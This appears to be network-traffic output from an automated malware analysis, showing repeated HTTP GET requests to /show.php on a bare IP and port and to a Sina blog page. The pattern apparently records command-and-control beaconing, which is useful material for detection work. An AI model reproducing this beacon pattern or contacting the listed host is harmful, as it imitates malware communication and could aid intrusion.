Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
